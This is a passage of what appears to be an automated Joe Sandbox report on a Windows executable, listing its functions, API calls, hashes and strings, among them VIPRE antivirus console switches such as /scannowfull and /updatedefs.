                                                                            • Instruction Fuzzy Hash: E1E1373A60064097E74AAF32D9587DE77A2FB4DB91F044139AB4B476B1EF78D468CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400377CC Relevance: 15.1, APIs: 10, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                            • String ID:
                                                                            • API String ID: 2667261700-0
                                                                            • Opcode ID: b9cc029e578b55f4e71bfb0e2601f201283755def9b7ca961f0f7ef1f16749c0
                                                                            • Instruction ID: 52120ccb9b4ab4cb6d756ac4511413edec13ee11dbb2109200b8ad32074023fa
                                                                            • Opcode Fuzzy Hash: b9cc029e578b55f4e71bfb0e2601f201283755def9b7ca961f0f7ef1f16749c0
                                                                            • Instruction Fuzzy Hash: 704181B574068487EE2ECF1691587AA63A2F78CB80F144525DBAE577A1DF78D451C300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400375D4 Relevance: 10.5, APIs: 7, Instructions: 35COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$CapsDevice
                                                                            • String ID:
                                                                            • API String ID: 4163108049-0
                                                                            • Opcode ID: 78a9545ec0c6638fe582392515822ea47f35c0b82a01e3525930a47a7f0cc018
                                                                            • Instruction ID: ab783497ddf3bae56904748af8978ee9f3d3dba7f91fbe07d742f7c1491047e7
                                                                            • Opcode Fuzzy Hash: 78a9545ec0c6638fe582392515822ea47f35c0b82a01e3525930a47a7f0cc018
                                                                            • Instruction Fuzzy Hash: 47014476A0074097EB099F72E95C75A7662FB4CB61F048039CB4A8B7E0DFBD84958B40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140144AB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 40COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$Profile$EnterInitializeLeave
                                                                            • String ID: DragDelay$DragMinDist$windows
                                                                            • API String ID: 2203521320-2101198082
                                                                            • Opcode ID: 4157cd7e166909cd92d70fd4e1914eaeaffffb8f63f7fc1f91c9f83ed929f74d
                                                                            • Instruction ID: 04705c67083e3ff8b3d64257ca15be663ad568148be5ec33844b7af3041e434b
                                                                            • Opcode Fuzzy Hash: 4157cd7e166909cd92d70fd4e1914eaeaffffb8f63f7fc1f91c9f83ed929f74d
                                                                            • Instruction Fuzzy Hash: 31114C72511B019FF7229F26E448B9937A5F31873AF420628CB68062F5DBBCC589CB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140075108 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • VerSetConditionMask.KERNEL32 ref: 0000000140075163
                                                                            • VerSetConditionMask.KERNEL32 ref: 0000000140075174
                                                                            • VerifyVersionInfoW.KERNEL32 ref: 0000000140075187
                                                                            • GetSystemMetrics.USER32 ref: 0000000140075198
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075E2D
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075E44
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075E5F
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075E6B
                                                                              • Part of subcall function 0000000140075E0C: GetDeviceCaps.GDI32 ref: 0000000140075E9B
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075EA9
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075EBC
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075ECB
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075EDA
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075EE9
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075EF8
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F07
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F13
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F1F
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F2B
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F37
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F46
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F52
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F61
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F70
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F7F
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F8E
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F9D
                                                                              • Part of subcall function 00000001400757A8: GetDeviceCaps.GDI32 ref: 0000000140075806
                                                                              • Part of subcall function 00000001400757A8: DeleteObject.GDI32 ref: 0000000140075873
                                                                              • Part of subcall function 00000001400757A8: DeleteObject.GDI32 ref: 0000000140075896
                                                                              • Part of subcall function 00000001400757A8: DeleteObject.GDI32 ref: 00000001400758B9
                                                                              • Part of subcall function 00000001400757A8: DeleteObject.GDI32 ref: 00000001400758DC
                                                                              • Part of subcall function 00000001400757A8: DeleteObject.GDI32 ref: 00000001400758FF
                                                                              • Part of subcall function 00000001400757A8: DeleteObject.GDI32 ref: 0000000140075923
                                                                              • Part of subcall function 000000014007521C: GetSystemMetrics.USER32 ref: 000000014007523A
                                                                              • Part of subcall function 000000014007521C: GetSystemMetrics.USER32 ref: 000000014007524B
                                                                              • Part of subcall function 000000014007521C: SetRectEmpty.USER32 ref: 0000000140075261
                                                                              • Part of subcall function 000000014007521C: EnumDisplayMonitors.USER32 ref: 0000000140075275
                                                                              • Part of subcall function 000000014007521C: SystemParametersInfoW.USER32 ref: 000000014007528A
                                                                              • Part of subcall function 000000014007521C: SystemParametersInfoW.USER32 ref: 00000001400752C1
                                                                              • Part of subcall function 000000014007521C: SystemParametersInfoW.USER32 ref: 00000001400752D9
                                                                              • Part of subcall function 000000014007521C: SystemParametersInfoW.USER32 ref: 0000000140075304
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Color$System$DeleteObject$Info$Parameters$Metrics$CapsConditionDeviceMask$DisplayEmptyEnumMonitorsRectVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 1661573292-0
                                                                            • Opcode ID: a6258f1061695804a294fa076e17b982e36a98ca024d76928b001b8c9824c9c5
                                                                            • Instruction ID: 897f60ca80ca6558607a8615851971d28442fb53aade3046c9004bb5af628607
                                                                            • Opcode Fuzzy Hash: a6258f1061695804a294fa076e17b982e36a98ca024d76928b001b8c9824c9c5
                                                                            • Instruction Fuzzy Hash: EF115E3560468082FB26AF72E81D3DA7791E78CB89F440034DB4A4B7A5DFBDC1458B40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400762D4 Relevance: 3.1, APIs: 2, Instructions: 69COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsObjectSelectText$ExceptionThrowWindow
                                                                            • String ID:
                                                                            • API String ID: 926127490-0
                                                                            • Opcode ID: e00aaebd14f2e999bcfcc72b2db4893e414e9740bb0caa8c9e6f81096da117de
                                                                            • Instruction ID: 00ed161b9ddd1ee363df6d59b6d6070b80523c0eaf78e8d6c2fedbb0c6e568c2
                                                                            • Opcode Fuzzy Hash: e00aaebd14f2e999bcfcc72b2db4893e414e9740bb0caa8c9e6f81096da117de
                                                                            • Instruction Fuzzy Hash: 9C312732701A80ABEB09DF6AD8943DD7370F788794F410126EB2A977A9DF34CA15C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400373A8 Relevance: 3.0, APIs: 2, Instructions: 24COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Color$MetricsSystem$BrushCapsCursorDeviceLoad
                                                                            • String ID:
                                                                            • API String ID: 3232524254-0
                                                                            • Opcode ID: dafa7c0bc3d4399581d4628cf608d9d229f3049ac6f4cc6ac7259ffa0f0857d8
                                                                            • Instruction ID: febbf4cd23352729bd1d5e9ac2533448d5a92182838231a72feb886e90666ee3
                                                                            • Opcode Fuzzy Hash: dafa7c0bc3d4399581d4628cf608d9d229f3049ac6f4cc6ac7259ffa0f0857d8
                                                                            • Instruction Fuzzy Hash: 60F03072A00B0487E71A9F35E00A76E27A2F70CB08F100138DA494A3D9DFBDC4558380
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401ED10C Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 288 1401ed10c-1401ed11b 289 1401ed11d-1401ed129 288->289 290 1401ed12b-1401ed13b 288->290 289->290 291 1401ed16e-1401ed179 call 1401d8728 289->291 292 1401ed152-1401ed16a RtlAllocateHeap 290->292 297 1401ed17b-1401ed180 291->297 293 1401ed13d-1401ed144 call 1401ec58c 292->293 294 1401ed16c 292->294 293->291 300 1401ed146-1401ed150 call 1401f93fc 293->300 294->297 300->291 300->292
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00000001401F1406,?,?,?,00000001401D8731,?,?,?,?,00000001401ED2A2,?,?,00000000), ref: 00000001401ED161
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 662f149e2cc767e93f5299b8001a9bccfa184fc0b5ea85232da4f3914bc0e9eb
                                                                            • Instruction ID: d3488c8105fd979a18f19eb53cd6b0e1b69393b12be7f08a94183d0ea2284044
                                                                            • Opcode Fuzzy Hash: 662f149e2cc767e93f5299b8001a9bccfa184fc0b5ea85232da4f3914bc0e9eb
                                                                            • Instruction Fuzzy Hash: 33F09A7430220481FE6B67A399513EE22865F8DFA0F4C54304F0A863F2DE3CCC818290
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 0000000140004770 Relevance: 127.2, APIs: 41, Strings: 31, Instructions: 1171comthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo$ConsoleCreateCtrlCurrentHandlerInstanceThread_com_issue_error
                                                                            • String ID: %d - %s$%s$/applydefs$/apstate$/displaylastscanresult$/displaylastscantime$/displaylocaldefversion$/displaysdkversion$/displayvipreversion$/enableap$/enablefw$/nr$/scanfile$/scannowfull$/scannowquick$/updatedefs$CServerConnection::SynchronizeConnectionState$Disabled$ERROR:Could not set control handler$ERROR:Couldn't access AP controller$ERROR:Couldn't access VIPRE interface$ERROR:Couldn't access service interface$ERROR:Couldn't access threat definition interface$ERROR:Couldn't get VIPRE version$ERROR:Couldn't get current local threat definitions version$ERROR:Couldn't get current product version$ERROR:Couldn't start a threat definition update$ERROR:Unexpected number of parameters : %d$Enabled$Failed to get the ServerConnection instance.$SBAM.Common
                                                                            • API String ID: 983190622-1673929483
                                                                            • Opcode ID: 2175e76c8966e9e2c91432a9e9c153b8283cf491260df2ab5baf2bdf7b3f79df
                                                                            • Instruction ID: e2ccf87b5099f0f7b934bda8e5f3f9185fd1f49f832c8f2bd04db4d19a08eeb6
                                                                            • Opcode Fuzzy Hash: 2175e76c8966e9e2c91432a9e9c153b8283cf491260df2ab5baf2bdf7b3f79df
                                                                            • Instruction Fuzzy Hash: C3B2BFB2214A4182EB62EF27F4547EE73A1FB89B95F804012FB4A972B5DF78C945C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401DE848 Relevance: 33.4, APIs: 21, Instructions: 1857COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 2880407647-0
                                                                            • Opcode ID: ac3efb290208e8ae0aa939dd7ccb27a44b6dea8bf0587a3634350ef81f9eea52
                                                                            • Instruction ID: d55e0586a353003d38fd01ccca46069b0816c393a8d43c12287e66a16324f9fb
                                                                            • Opcode Fuzzy Hash: ac3efb290208e8ae0aa939dd7ccb27a44b6dea8bf0587a3634350ef81f9eea52
                                                                            • Instruction Fuzzy Hash: 9103A3722002C18BD776DE26E940BE937E6F79CB8CF441129DB066BBA9D734DA45CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014004A11C Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 230windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateSelect$Color$BitmapCompatible$BrushPixelSolid
                                                                            • String ID:
                                                                            • API String ID: 3358463585-3916222277
                                                                            • Opcode ID: 1df8b1d2eb40a2e4c64d6f9953f07afc6d8e6ddda128a5a288f14fc75fc205f1
                                                                            • Instruction ID: 36a310155856242cf22ac8df365cc62708b8248cfa66fc5bdf7cbf623e4e9850
                                                                            • Opcode Fuzzy Hash: 1df8b1d2eb40a2e4c64d6f9953f07afc6d8e6ddda128a5a288f14fc75fc205f1
                                                                            • Instruction Fuzzy Hash: 57B14836B00A409AE711DFA2E4447DE77B2F78D798F410225AF4A67BA9DF78C909C704
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400F8588 Relevance: 30.5, APIs: 20, Instructions: 540windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Append$CountItem$Window$MessageSend$std::ios_base::~ios_base
                                                                            • String ID:
                                                                            • API String ID: 3077673360-0
                                                                            • Opcode ID: 1609092b61a251d599070388332eed870609b53ab1e186e3f12fea724001bc05
                                                                            • Instruction ID: 593342c414d0840502a905506aa168c8c238ab7ad9b31de17f1f977baee00964
                                                                            • Opcode Fuzzy Hash: 1609092b61a251d599070388332eed870609b53ab1e186e3f12fea724001bc05
                                                                            • Instruction Fuzzy Hash: B4226D76304A4181EA56DB67E5653EE23A1FB8DBC0F484026EF4A87BB6DF78C845C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400B4288 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 346windowkeyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ParentState$ClientCursorScreenWindow
                                                                            • String ID: @
